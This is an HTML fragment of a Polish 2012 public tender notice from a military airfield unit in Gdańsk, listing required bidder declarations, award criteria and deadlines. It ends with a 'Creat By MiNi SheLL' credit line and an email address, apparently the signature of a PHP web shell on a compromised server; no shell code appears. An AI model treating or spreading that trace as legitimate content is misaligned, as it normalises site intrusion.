<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający żąda, żeby w składanej ofercie Wykonawca przedstawił następujące oświadczenia i dokumenty:
1.  Oświadczenie o braku podstaw do wykluczenia firmy z postępowania.
2. Oświadczenie Wykonawcy wynikające z treści art. 22 ust. 1 ustawy PZP (wg wzoru załącznika do formularza oferty), że:
a. posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, 
b.  posiada wiedzę  i doświadczenie,
c. dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d. znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
3. Oświadczenie, że Wykonawca zapoznał się ze specyfikacją istotnych warunków zamówienia wraz z załącznikami, a w szczególności z projektem umowy załączonym do w/w specyfikacji i przyjmuje zawarte w niej warunki bez zastrzeżeń oraz, że uzyskał na własną odpowiedzialność i ryzyko wszelkie istotne informacje o warunkach, w których będzie realizowany przedmiot zamówienia i uwzględnił je w kalkulacji ceny oferty.
4. Oświadczenie, że złożył ofertę na warunkach określonych przez Zamawiającego na realizację przedmiotu zamówienia i w przypadku wyboru jego oferty jako najkorzystniejszej 
zobowiązuje się wykonać przedmiot zamówienia zgodnie z SIWZ i złożoną ofertą.
5. Oświadczenie Wykonawcy, że do rozwiązań technicznych zawartych w przedmiocie 
zamówienia zastosuje materiały spełniające wymagania ustawy z dnia 16 kwietnia 2004 r. 
o wyrobach budowlanych (Dz. U. 2004 r. Nr 92, poz. 881 z późniejszymi zmianami) zgodnie z wytycznymi wymienionymi w SIWZ.
6. Oświadczenie Wykonawcy o spełnieniu wymogów zawartych w Ustawie z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (tekst jednolity Dz. U. z 2010 r. nr 182  
poz. 1228) łącznie z przepisami wykonawczymi do ww. ustawy ,w zakresie korzystania 
z dokumentów międzynarodowych o klauzuli RESTRICTED - ZASTRZEŻONE.
7. Oświadczenie o znajomości odpowiedzialności karnej za naruszenie przepisów Ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (tekst jednolity Dz. U. z 2010 r. nr 182  poz. 1228) łącznie z przepisami wykonawczymi do ww. ustawy.
8. Oświadczenie Wykonawcy, że posiada pracowników i zaplecze pozwalające prowadzić 
prace na materiałach zawierających informacje niejawne.
UWAGA 1: w przypadku złożenia oferty wspólnej oświadczenia określone w pkt 1,2,3,6,7 i 8 każdy Wykonawca  składa  z osobna.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Ilość wykonanych usług - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z § 15 wzoru umowy załączonego do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.17tol-gdansk.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nie dotyczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2012 godzina 10:30, miejsce: 17 TERENOWY ODDZIAŁ LOTNISKOWY, UL.M.Konopnickiej 13, 80-240 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com